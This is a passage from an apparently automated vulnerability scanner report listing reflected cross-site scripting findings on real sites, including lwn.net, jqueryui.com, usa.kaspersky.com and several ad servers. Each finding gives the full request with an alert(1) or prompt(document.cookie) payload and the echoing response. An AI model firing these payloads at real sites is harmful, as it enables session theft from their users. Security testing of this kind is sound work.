This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620656a0"-alert(1)-"a474aaf0673&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:31 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4916
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620656a0"-alert(1)-"a474aaf0673");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620656a0"-alert(1)-"a474aaf0673");
mpck = "ht
...[SNIP]...

1.39. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab5d"%3balert(1)//95b028c6b12 was submitted in the mpvc parameter. This input was echoed as 1ab5d";alert(1)//95b028c6b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3f1ab5d"%3balert(1)//95b028c6b12 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:35 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4918
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?1ab5d";alert(1)//95b028c6b12");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0
...[SNIP]...

1.40. http://img.mediaplex.com/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa8f2'%3balert(1)//0f211c345d2 was submitted in the mpvc parameter. This input was echoed as fa8f2';alert(1)//0f211c345d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17550/135052/CollabBreakaway_MM_Banner1_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17550-135052-6950-0%3Fmpt%3D8258620&mpt=8258620&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/b%3B245464002%3B1-0%3B1%3B43070067%3B4252-336/280%3B43835960/43853747/1%3B%3B%7Eaopt%3D2/0/25/0%3B%7Esscs%3D%3ffa8f2'%3balert(1)//0f211c345d2 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: svid=319726075672; mojo3=17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:37 GMT
Server: Apache
Last-Modified: Wed, 31 Aug 2011 23:09:57 GMT
ETag: "803414-fc8-4abd53a0a9b40"
Accept-Ranges: bytes
Content-Length: 4918
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/b;245464002;1-0;1;43070067;4252-336/280;43835960/43853747/1;;~aopt=2/0/25/0;~sscs=?fa8f2';alert(1)//0f211c345d2http://altfarm.mediaplex.com/ad/ck/17550-135052-6950-0?mpt=8258620" target="_blank">
...[SNIP]...

1.41. http://jlinks.industrybrains.com/jsct [ct parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload dc696<script>alert(1)</script>8652984785e was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e&tr=MARKETPLACE&num=5&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 12:15:59 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 12:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 88

// Error: Unknown old section COMPUTERWORLD_ROSdc696<script>alert(1)</script>8652984785e

1.42. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a555<script>alert(1)</script>c347c309378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE&num=5&layt=1&fmt=simp&3a555<script>alert(1)</script>c347c309378=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 12:16:01 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 12:16:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 69

// Error: Unknown parameter 3a555<script>alert(1)</script>c347c309378

1.43. http://jlinks.industrybrains.com/jsct [tr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jlinks.industrybrains.com
Path:	/jsct

Issue detail

The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload 4f4dc<script>alert(1)</script>88b544abd8e was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=756&ct=COMPUTERWORLD_ROS&tr=MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e&num=5&layt=1&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Connection: close
Date: Sun, 04 Sep 2011 12:15:59 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Sun, 04 Sep 2011 12:15:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 86

// Error: Site 756 has no section MARKETPLACE4f4dc<script>alert(1)</script>88b544abd8e

1.44. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4299d"><script>alert(1)</script>5956202a0bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?4299d"><script>alert(1)</script>5956202a0bb=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:02:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117289

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&4299d"><script>alert(1)</script>5956202a0bb=1" type="text/css" media="all" />
...[SNIP]...

1.45. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jsc.madisonlogic.com
Path:	/jsc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 551f2<script>alert(1)</script>1434922bee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsc?pub=88&pgr=75&src=3971&layrf=5657&num=1&551f2<script>alert(1)</script>1434922bee4=1 HTTP/1.1
Host: jsc.madisonlogic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itwhitepapers.com/index.phpb5ac2%22-prompt(%22Fool%22)-%221c3a60ce1ff
Cookie: __utma=15425322.657461619.1313187593.1313187593.1313197931.2; __utmz=15425322.1313197931.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 14:47:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 14:47:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 551f2<script>alert(1)</script>1434922bee4

1.46. http://lwn.net/Articles/456878/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 716e8"><script>alert(1)</script>6b13a308d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles716e8"><script>alert(1)</script>6b13a308d40/456878/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:13:56 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles716e8"><script>alert(1)</script>6b13a308d40/456878/?format=printable" rel="nofollow">
...[SNIP]...

1.47. http://lwn.net/Articles/456878/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d0e"><script>alert(1)</script>6a13f79386a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/ HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:14:01 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles/45687829d0e"><script>alert(1)</script>6a13f79386a/?format=printable" rel="nofollow">
...[SNIP]...

1.48. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/Articles/456878/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de815"><script>alert(1)</script>abe18a1863 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1 HTTP/1.1
Host: lwn.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/#sclient=psy&hl=en&tbm=nws&source=hp&q=%22xss.cx%22&pbx=1&oq=%22xss.cx%22&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0&fp=1&biw=1407&bih=931&bav=on.2,or.r_gc.r_pw.&cad=b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:41 GMT
Server: Apache
Expires: -1
Content-Length: 18611
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<a href="/Articles/456878/?de815"><script>alert(1)</script>abe18a1863=1?format=printable" rel="nofollow">
...[SNIP]...

1.49. http://lwn.net/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lwn.net
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836fe"><script>alert(1)</script>97f2d4406c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico836fe"><script>alert(1)</script>97f2d4406c3 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: lwn.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 12:14:10 GMT
Server: Apache
Expires: -1
Content-Length: 4295
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/favicon.ico836fe"><script>alert(1)</script>97f2d4406c3?format=printable" rel="nofollow">
...[SNIP]...

1.50. https://lwn.net/login [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://lwn.net
Path:	/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba08"><script>alert(1)</script>a496f0dd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login7ba08"><script>alert(1)</script>a496f0dd586 HTTP/1.1
Host: lwn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:58 GMT
Server: Apache
Expires: -1
Content-Length: 3762
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/login7ba08"><script>alert(1)</script>a496f0dd586?format=printable" rel="nofollow">
...[SNIP]...

1.51. https://store.digitalriver.com/store/kasperus/en_US/buy/productID.224976400 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/store/kasperus/en_US/buy/productID.224976400

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60c77--><script>alert(1)</script>8fd004d51c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/kasperus/en_US/buy/productID.224976400?60c77--><script>alert(1)</script>8fd004d51c5=1 HTTP/1.1
Host: store.digitalriver.com
Connection: keep-alive
Referer: http://usa.kaspersky.com/node/12354/lightbox2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; ORA_WX_SESSION="10.2.2.97:772-0#0"; JSESSIONID=DFC074834E717E721063668DDA488A72; VISITOR_ID=971D4E8DFAED4367B7156331573704A34236C16992AB1AF2; BIGipServerp-drh-dc2pod9-pool2-active=1627521546.772.0000; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66802880292,0)
Date: Sun, 04 Sep 2011 12:36:20 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app96
Content-Length: 144211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<script>alert(1)</script>8fd004d51c5=1&Action=DisplayESIPage&Currency=USD&ESIHC=701de6e5&Env=BASE&Locale=en_US&SiteID=kasperus&StyleID=22810400&StyleVersion=41&ceid=175598900&cename=TopHeader&id=ShoppingCartPage&productID=224976400&scrip
...[SNIP]...

1.52. http://usa.kaspersky.com/ [domain parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The value of the domain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a54d2"><script>alert(1)</script>6a31e0ff9e9 was submitted in the domain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:18:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138695"
Content-Type: text/html; charset=utf-8
Content-Length: 49581
Date: Sun, 04 Sep 2011 12:18:20 GMT
X-Varnish: 1163043182
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?domain=kapersky.coma54d2"><script>alert(1)</script>6a31e0ff9e9" />
...[SNIP]...

1.53. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6626"><script>alert(1)</script>ccf8d1d548d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?domain=kapersky.com&d6626"><script>alert(1)</script>ccf8d1d548d=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:18:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138728"
Content-Type: text/html; charset=utf-8
Content-Length: 49591
Date: Sun, 04 Sep 2011 12:18:53 GMT
X-Varnish: 1163044152
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/?domain=kapersky.com&d6626"><script>alert(1)</script>ccf8d1d548d=1" />
...[SNIP]...

